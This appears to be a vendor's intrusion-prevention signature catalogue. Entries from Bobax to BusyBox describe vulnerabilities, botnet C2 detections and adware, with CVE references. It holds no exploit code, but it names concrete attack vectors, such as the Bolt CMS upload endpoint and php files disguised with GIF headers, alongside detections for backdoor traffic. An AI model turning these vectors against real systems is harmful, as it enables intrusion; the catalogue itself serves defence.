https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9833

Bobax

About this vulnerability:	Bobax
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Bobax is a Botnet used for sending spam messages.
Situation:	HTTP_CSU-Bobax-Activity

BoidCMS-Command-Injection

About this vulnerability:

An attempt to exploit a vulnerability in BoidCMS detected.

Risk:

High

First detected in:

sgpkg-ips-1702-5242

Last changed:

sgpkg-ips-1702-5242

Platform:

Linux; Windows

Software:

BoidCMS

Type:

Input Validation

Description:

A vulnerability in BoidCMS, versions 2.0.0 and before, which allows users to upload and execute php files as media if the file has the GIF header, due to insufficient input validation.

Situation:

HTTP_CS-BoidCMS-Command-Injection

References:

CVE-2023-38836
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38836

BolinTech-Dream-FTP-Server-Format-String

About this vulnerability:

A BolinTech Dream FTP Server Format String vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-739-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

DreamFTP

Type:

Input Validation

Description:

A vulnerability in BolinTech Dream FTP Server, version 1.02, which allows remote attackers to cause a denial of service condition via format string specifiers in the PASS, RETR, and USER commands.

Situation:

FTP_CS-BolinTech-Dream-FTP-Server-Format-String

References:

CVE-2004-2074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2074

BID-9800
http://www.securityfocus.com/bid/9800

OSVDB-4986
http://www.osvdb.org/4986

Bolt-CMS-Authenticated-Remote-Code-Execution

About this vulnerability:	A vulnerability in Bolt CMS.
Risk:	High
First detected in:	sgpkg-ips-1369-5242
Last changed:	sgpkg-ips-1369-5242
Platform:	Unix; Linux
Software:	Bolt CMS
Type:	Input Validation
Description:	A vulnerability in Bolt CMS, versions 3.7.0 and 3.6.*, which allows remote attackers to execute arbitrary code by uploading malicious php files via POST requests to /async/folder/rename. The files can then be executed with a GET request to the malicious file.
Situation:	HTTP_CS-Bolt-CMS-Authenticated-Remote-Code-Execution

Bomberclone-Buffer-Overflow

About this vulnerability:

A Bomberclone Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-796-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Bomberclone

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Bomberclone, version 0.11.6, which allows remote attackers to execute arbitrary code via long error messages.

Situation:

Generic_UDP-Bomberclone-Buffer-Overflow

References:

CVE-2006-0460
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0460

BID-16697
http://www.securityfocus.com/bid/16697

OSVDB-23263
http://www.osvdb.org/23263

Bookedspace

About this vulnerability:	BookedSpace
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	BookedSpace
Type:	Misconfiguration
Description:	BookedSpace is an adware that will generate pop-up ads while you browse the internet. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSU-Bookedspace HTTP_CSH-Bookedspace

BOOTP-Daemon-Long-Filename-BOF

About this vulnerability:

A buffer overflow vulnerability in Bootp filename

Risk:

Moderate

First detected in:

sgpkg-ips-511-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

bootpd

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Bootp daemon versions 2.4.3 and older. Passing a long filename parameter may result in system compromise.

Situation:

BOOTP_CS-BOOTP-Daemon-Long-Filename-BOF

References:

CVE-1999-0799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0799

BOOTP-Sun-Solaris-in.dhcpd-Malformed-Packet

About this vulnerability:

A buffer overflow vulnerability in Sun Solaris in.dhcpd

Risk:

Moderate

First detected in:

sgpkg-ips-581-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

bootpd

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Sun Solaris in.dhcpd, which is triggered by BOOTP packets with non-null value in the ciaddr field.

Situation:

BOOTP_CS-Sun-Solaris-in.dhcpd-Malformed-Packet

References:

BID-5190
http://www.securityfocus.com/bid/5190

Borland-Accurev-Savecontentserviceimpl-Servlet-Directory-Traversal

About this vulnerability:	A vulnerability in Borland AccuRev
Risk:	Moderate
First detected in:	sgpkg-ips-694-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Borland AccuRev
Type:	Directory Traversal
Description:	There exists a denial of service and an information disclosure vulnerability in the Borland AccuRev. A remote attacker can use this to read or delete files on the affected system.
Situation:	HTTP_CRL-Borland-Accurev-Savecontentserviceimpl-Servlet-Directory-Traversal

Borland-Interbase-Database-Message-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in Borland Software InterBase

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Borland Interbase

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Borland InterBase Server. The vulnerability is due to lack of boundary protection while processing Connect requests (Opcode 0x01). A remote unauthenticated attacker can send a crafted request to the target host to exploit this vulnerability. Successful attack could allow for arbitrary code being injected and executed with the privileges of the affected service, which is normally System on Windows platforms. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Successful attack could allow for arbitrary code being executed with the privileges of the affected service, which is normally System on Windows platforms. In the case of an unsuccessful code execution attack, the affected service will terminate resulting in a denial of service condition.

Situation:

Generic_CS-Borland-Interbase-Database-Message-Handling-Buffer-Overflow

References:

BID-29302
http://www.securityfocus.com/bid/29302

Borland-Interbase-Database-Service-Malformed-Request-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Borland InterBase Server

Risk:

High

First detected in:

sgpkg-ips-118-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Borland Interbase

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Borland InterBase Server. A crafted request with a malicious payload allows the compromise of a vulnerable system.

Situation:

Generic_Borland-Interbase-Database-Service-Malformed-Request-BOF-2
Generic_Borland-Interbase-Database-Service-Malformed-Request-Buffer-Overflow

References:

CVE-2007-3566
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3566

BID-25048
http://www.securityfocus.com/bid/25048

OSVDB-38602
http://www.osvdb.org/38602

Borland-Interbase-Integer-Overflow-Vulnerability

About this vulnerability:

Integer overflow vulnerability in Borland Interbase

Risk:

Moderate

First detected in:

sgpkg-ips-159-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux;Windows

Software:

Borland Interbase

Type:

Buffer Overflow

Description:

Borland Interbase suffers from an integer overflow vulnerability. The vulnerability allows remote attackers to cause a stack-based buffer overflow, and can be used to execute arbitrary code on a vulnerable server.

Situation:

Generic_Borland-Interbase-Integer-Overflow

References:

CVE-2008-2559
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2559

BID-29302
http://www.securityfocus.com/bid/29302

Borland-Interbase-Multiple-Remote-Buffer-Overflows

About this vulnerability:

Multiple buffer overflow vulnerabilities in Borland Interbase

Risk:

Moderate

First detected in:

sgpkg-ips-153-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux;Windows

Software:

Borland Interbase

Type:

Buffer Overflow

Description:

Borland Interbase suffers from multiple stack-based buffer overflow vulnerabilities. Crafted requests can be sent by remote attackers to tcp port 3050 on vulnerable systems, potentially leading to arbitrary code execution.

Situation:

Generic_CS-Borland-Interbase-INET-Connect-Buffer-Overflow
Generic_CS-Borland-Interbase-SVC-Attach-Buffer-Overflow
Generic_CS-Borland-Interbase-Jrd8-Create-Database-Buffer-Overflow
Generic_CS-Borland-Interbase-Isc-Attach-And-Create-Database-Buffer-Overflow

References:

CVE-2007-5243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5243

BID-25917
http://www.securityfocus.com/bid/25917

OSVDB-38609
http://www.osvdb.org/38609

OSVDB-38608
http://www.osvdb.org/38608

OSVDB-38607
http://www.osvdb.org/38607

OSVDB-38606
http://www.osvdb.org/38606

OSVDB-38605
http://www.osvdb.org/38605

Borland-Interbase-Open-Marker-File-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Borland Interbase open_marker_file function

Risk:

Moderate

First detected in:

sgpkg-ips-153-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux;Windows

Software:

Borland Interbase

Type:

Buffer Overflow

Description:

The open_marker_file function in Borland Interbase suffers from a stack-based buffer overflow vulnerability. The vulnerability can be exploited with crafted requests over TCP port 3050, and allows arbitrary code execution on the vulnerable system.

Situation:

Generic_CS-Borland-Interbase-Isc-Attach-And-Create-Database-Buffer-Overflow

References:

CVE-2007-5244
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5244

BID-25917
http://www.securityfocus.com/bid/25917

OSVDB-38610
http://www.osvdb.org/38610

Borland-Software-Interbase-ibserver.exe-Service-Attach-Request-BOF

About this vulnerability:

A buffer overflow vulnerability in Borland InterBase Server

Risk:

High

First detected in:

sgpkg-ips-152-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Borland Interbase

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Borland InterBase Server. A remote attacker can send a crafted Service Attach request to the vulnerable server to terminate the affected service to cause a denial of service condition or to execute arbitrary code with the privileges of the affected service, normally System on Windows systems.

Situation:

Generic_CS-Borland-Software-Interbase-ibserver.exe-Service-Attach-Request-BOF

References:

CVE-2008-1910
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1910

BID-28730
http://www.securityfocus.com/bid/28730

OSVDB-44455
http://www.osvdb.org/44455

Borland-Starteam-Multicast-Service-HTTP-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in Borland StarTeam Multicast Service

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Borland StarTeam Multicast Service; Borland CaliberRM; Borland StarTeam

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Borland StarTeam Multicast Service.

Situation:

HTTP_CS-Borland-Starteam-Multicast-Service-HTTP-Handling-Buffer-Overflow

References:

CVE-2008-0311
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0311

BID-28602
http://www.securityfocus.com/bid/28602

Bot:-Dirtjumper-Traffic-Detected

About this vulnerability:	DirtJumper Traffic
Risk:	High
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	DirtJumper is a Windows malware.
Situation:	HTTP_CSH-Dirtjumper-Traffic HTTP_CRL-Dirtjumper-Traffic

Botnet-Command-And-Control

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-739-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	Botnet-CnC-Traffic-Detected

Botnet-Fareit

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-739-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	Botnet-Fareit-Traffic-Detected File-Binary_Fareit-A-Botnet-Traffic

Botnet-Fynloski

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-758-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	Generic_SS-Fynloski-Botnet-Traffic

Botnet-Ghost

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-739-5211
Last changed:	sgpkg-ips-1550-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	Botnet-Ghost-Traffic-Detected Generic_CS-Ghost-Activity

Botnet-Kuluoz

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-739-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	Botnet-Kuluoz-Traffic-Detected File-Binary_Kuluoz-Botnet-Traffic

Botnet-Nitol

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-739-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	Botnet-Nitol-Traffic-Detected Generic_CS-Nitol-Activity-2

Botnet-njRAT

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-1125-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	NJRat is a malicious botnet which is a serious threat to Internet users. Most notably, NJRat engages in trojan activity and allows remote backdoor access to infected computers. Users of infected computers are advised to disinfect their computers and change passwords for online banking and other online services immediately.
Situation:	Generic_CS-njRAT-Activity

Botnet-Palevo

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-739-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	Botnet-Palevo-Traffic-Detected Generic_UDP-Palevo-Activity

Botnet-PoisonIvy

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-1125-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	PoisonIvy is a malicious botnet. Infected computers are subject to a variety of remote control functionality, ranging from remote administration to surveillance. Infections of PoisonIvy should be handled immediately.
Situation:	Generic_SS-PoisonIvy-Activity

Botnet-Pramro

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-739-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	Botnet-Pramro-Traffic-Detected

Botnet-Pushdo

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-739-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	Botnet-Pushdo-Traffic-Detected Generic_CS-Pushdo-B-Activity

Botnet-Ramnit

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-739-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	Botnet-Ramnit-Traffic-Detected Generic_CS-Ramnit-Activity

Botnet-Sality_NonP2P

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-739-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	Botnet-Sality_NonP2P-Traffic-Detected File-Binary_Sality-NonP2P-A-Botnet-Traffic

Botnet-Sality_P2P

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-739-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	Botnet-Sality_P2P-Traffic-Detected

Botnet-Smokeloader

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-739-5211
Last changed:	sgpkg-ips-1365-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	Botnet-Smokeloader-Traffic-Detected HTTP_CS-Smokeloader-Malware-Infection-Traffic File-Binary_Smokeloader-C-Botnet-Traffic File-Binary_Smokeloader-A-Botnet-Traffic

Botnet-Teslacrypt

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-758-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	File-Text_Teslacrypt-Botnet-Traffic

Botnet-Tofsee

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-739-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	Botnet-Tofsee-Traffic-Detected Generic_SS-Tofsee-Activity

Botnet-Virut

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-739-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	Botnet-Virut-Traffic-Detected

Botnet-Vobfus

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-739-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	Botnet-Vobfus-Traffic-Detected

Botnet-Win32-Backdoor-Zmcwinsvc-DNS-Query

About this vulnerability:	A Botnet Win32 Backdoor Zmcwinsvc DNS Query detected
Risk:	High
First detected in:	sgpkg-ips-1059-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	A common domain used in DNS requests from Win32.Backdoor.Zmcwinsvc has been detected.
Situation:	DNS-UDP_Botnet-Win32-Backdoor-Zmcwinsvc-DNS-Query

Botnet-Yoddos

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-739-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	Botnet-Yoddos-Traffic-Detected Generic_SS-Yoddos-Activity Generic_CS-Yoddos-Activity

Botnet-ZeroAccess

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-739-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected

Botnet-Zeus_P2P

About this vulnerability:	Probable botnet command and control traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-739-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Probable botnet command and control traffic was detected
Situation:	Botnet-Zeus_P2P-Traffic-Detected

Bredolab-Bot

About this vulnerability:	Bredolab bot
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Bredolab is a Windows malware that can be remote controlled.
Situation:	HTTP_CSH-Bredolab-Bot-Activity HTTP_CSU-Bredolab-Bot-Activity

BrightStor-Arcserve-Backup-Agent-For-MSSQL-BOF

About this vulnerability:

Buffer overflow vulnerability in Veritas Backup Agent for MSSQL

Risk:

High

First detected in:

sgpkg-ips-163-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor

Type:

Buffer Overflow

Description:

There exists a stack based buffer overflow in BrightStor ARCserve and Enterprise Backup Agent for MSSQL. The vulnerability is caused due to a boundary error in the Backup Agents. A remote attacker can exploit this vulnerability to cause a denial of service condition or execute arbitrary code with the privileges of the currently running server, normally System.

Situation:

Generic_CS-CA-Arcserve-Backup-For-Windows-BOF

References:

CVE-2005-1272
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1272

BID-14453
http://www.securityfocus.com/bid/14453

OSVDB-18501
http://www.osvdb.org/18501

BrightStor-Arcserve-Enterprise-Backup-Discovery-Service-Servicepc-BOF

About this vulnerability:

Buffer overflow in ARCServe/Enterprise Backup Discovery Service

Risk:

High

First detected in:

sgpkg-ips-45-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates BrightStor

Type:

Buffer Overflow

Description:

Computer Associates BrightStor ARCServe and Enterprise Backup are vulnerable to a buffer overflow in its Discovery Service. A remote attacker could send a crafted TCP packet to the vulnerable server to execute arbitrary code on the server.

Situation:

Generic_BrightStor-Arcserve-Enterprise-Backup-Discovery-Service-BOF

References:

CVE-2005-2535
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2535

BID-12536
http://www.securityfocus.com/bid/12536

OSVDB-13814
http://www.osvdb.org/13814

BrightStor-Arcserve-Enterprise-Backup-UDP-BOF

About this vulnerability:

Buffer overflow in BrightStor ARCServe/Enterprise Backup

Risk:

High

First detected in:

sgpkg-ips-44-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates BrightStor

Type:

Buffer Overflow

Description:

Computer Associates BrightStor ARCServe and Enterprise Backup are vulnerable to a buffer overflow caused by improper bounds checking of user-supplied data. A remote attacker can exploit this to execute arbitrary code on the server.

Situation:

Generic_CA-BrightStor-Arcserve-Enterprise-Backup-UDP-BOF

References:

CVE-2005-0260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0260

BID-12491
http://www.securityfocus.com/bid/12491

OSVDB-13613
http://www.osvdb.org/13613

Broadcastpc

About this vulnerability:	BroadcastPC
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	BroadcastPC
Type:	Misconfiguration
Description:	BroadcastPC is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Broadcastpc

Broadwin-WebAccess-Client-Bwocxrun-ActiveX-Memory-Corruption

About this vulnerability:

A vulnerability in Broadwin Technology WebAccess Client

Risk:

Moderate

First detected in:

sgpkg-ips-568-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Broadwin WebAccess Client

Type:

Format String

Description:

A memory corruption vulnerability exists in an ActiveX component of Broadwin Technology's WebAccess client. The vulnerability is due to a lack of validation of the WriteTextData() and CloseFile() methods' arguments.

Situation:

File-Text_Broadwin-WebAccess-Client-Bwocxrun-ActiveX-Memory-Corruption

References:

CVE-2012-0241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0241

BID-52051
http://www.securityfocus.com/bid/52051

OSVDB-74898
http://www.osvdb.org/74898

Broadwin-WebAccess-Client-Bwocxrun-ActiveX-Ocxspool-Format-String

About this vulnerability:

A vulnerability in Broadwin Technology WebAccess Client

Risk:

Moderate

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Broadwin WebAccess Client

Type:

Format String

Description:

A format string vulnerability exists in an ActiveX component of Broadwin Technology's WebAccess client. The vulnerability is due to a lack of validation of the OcxSpool() method's argument. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted web page. Successful exploitation can result in arbitrary code execution in the context of the currently logged-in user.

Situation:

File-Text_Broadwin-WebAccess-Client-Bwocxrun-ActiveX-Ocxspool-Format-String

References:

CVE-2012-0242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0242

BID-52051
http://www.securityfocus.com/bid/52051

OSVDB-74897
http://www.osvdb.org/74897

Broadwin-WebAccess-Denial-Of-Service

About this vulnerability:	Broadwin WebAccess Denial Of Service
Risk:	High
First detected in:	sgpkg-ips-627-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Broadwin WebAccess Server
Type:	Malfunction
Description:	A vulnerability in Broadwin WebAccess that allows a remote attacker to crash the service by sending a specially crafted tcp packet.
Situation:	Generic_CS-Broadwin-WebAccess-Denial-Of-Service

Brocade-Network-Advisor-Climonitorreportservlet-Filename-Directory-Traversal

About this vulnerability:

A vulnerability in Brocade Network Advisor

Risk:

Moderate

First detected in:

sgpkg-ips-851-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Brocade Network Advisor

Type:

Directory Traversal

Description:

Improper path validation results in a directory traversal vulnerability in Brocade Network Advisor. A successfull attack can result in system-privileged file system read access.

Situation:

HTTP_CRL-Brocade-Network-Advisor-Climonitorreportservlet-Filename-Directory-Traversal

References:

CVE-2016-8207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8207

Brocade-Network-Advisor-Dashboardfilereceiveservlet-Filename-Directory-Traversal

About this vulnerability:

A vulnerability in Brocade Network Advisor

Risk:

High

First detected in:

sgpkg-ips-857-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Brocade Network Advisor

Type:

Directory Traversal

Description:

There exists a directory traversal vulnerability in Brocade Network Advisor. A remote, unauthenticated attacker can use this to execute arbitrary code with SYSTEM privileges on the affected system.

Situation:

HTTP_CSH-Brocade-Network-Advisor-Filename-Directory-Traversal

References:

CVE-2016-8205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8205

Brocade-Network-Advisor-Filereceiveservlet-Filename-Directory-Traversal

About this vulnerability:

A vulnerability in Brocade Network Advisor

Risk:

High

First detected in:

sgpkg-ips-859-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Brocade Network Advisor

Type:

Directory Traversal

Description:

There exists a directory traversal vulnerability in Brocade Network Advisor. A remote, unauthenticated attacker can use this to execute arbitrary code with SYSTEM privileges on the affected system.

Situation:

HTTP_CSH-Brocade-Network-Advisor-Filename-Directory-Traversal

References:

CVE-2016-8204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8204

Brocade-Network-Advisor-Softwareimageupload-Name-Filename-Directory-Traversal

About this vulnerability:

A vulnerability in Brocade Network Advisor

Risk:

High

First detected in:

sgpkg-ips-866-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Brocade Network Advisor

Type:

Directory Traversal

Description:

There exists a directory traversal vulnerability in Brocade Network Advisor. A remote, unauthenticated attacker can use this to cause a denial-of-service condition.

Situation:

HTTP_CSH-Brocade-Network-Advisor-Softwareimageupload-Name-Filename-Directory-Traversal

References:

CVE-2016-8206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8206

BSD-Ftpd-Off-By-One-BOF

About this vulnerability:

Off-by-one buffer overflow in BSD ftpd

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; BSD

Software:

BSD ftpd

Type:

Integer Overflow

Description:

Unpathced BSD ftpd daemons have a remotely exploitable buffer overflow vulnerability. If successfully exploited, this vulnerability provides the attacker a remote root access.

Situation:

FTP_CS-Bsdftpd-One-Byte-BOF-Mkd
FTP_CS-Bsdftpd-One-Byte-BOF-Mkd-1
FTP_CS-Bsdftpd-One-Byte-BOF-Mkd-2

References:

CVE-2001-0053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0053

BID-2124
http://www.securityfocus.com/bid/2124

Buer-Loader-C2-Traffic

About this vulnerability:	Buer Loader C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1211-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Buer is a malicious loader that downloads and executes payloads on the target system.
Situation:	HTTP_CSU-Buer-Loader-C2-Traffic

Bugbear-Worm

About this vulnerability:	BugBear Worm
Risk:	Low
First detected in:	sgpkg-ips-631-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	<os>
Type:	Code Injection
Description:	BugBear is a worm that spreads by e-mail.
Situation:	HTTP_CSH-Bugbear-Worm-Download

Business-Objects-Crystal-Reports-Rpt-File-Handling

About this vulnerability:

A buffer overflow vulnerability in Business Objects Crystal Reports

Risk:

Moderate

First detected in:

sgpkg-ips-124-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Business Objects Crystal Enterprise; Crystal Reports; Microsoft Visual Studio 2005; Microsoft Visual Studio .NET 2002; Microsoft Visual Studio .NET 2003

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the way Business Objects Crystal Reports handles RPT files. Versions of Crystal Reports are included with Microsoft's Visual Studio .NET 2002 and 2003, as well as Visual Studio 2005 products. The vulnerable application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. An attacker may exploit this issue by enticing a user into opening a malicious RPT file, resulting in the execution of arbitrary code with the privileges of the currently logged-in user. Failed exploit attempts are likely to result in denial of service conditions.

Situation:

HTTP_Business-Objects-Crystal-Reports-Rpt-File-Handling
File-OLE_Business-Objects-Crystal-Reports-Rpt-File-Handling

References:

CVE-2006-6133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6133

BID-21261
http://www.securityfocus.com/bid/21261

MS07-052
http://technet.microsoft.com/security/bulletin/MS07-052

Busybox-Project-Busybox-Udhcp-Option-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in BusyBox Project BusyBox

Risk:

Moderate

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BusyBox

Type:

Malfunction

Description:

Insufficient validation of DHCP packets causes an out of bounds read vulnerability in BusyBox. A successful exploit may be used to gain access to sensitive information.

Situation:

BOOTP_CS-Busybox-Project-Busybox-Udhcp-Option-Out-Of-Bounds-Read

References:

CVE-2018-20679
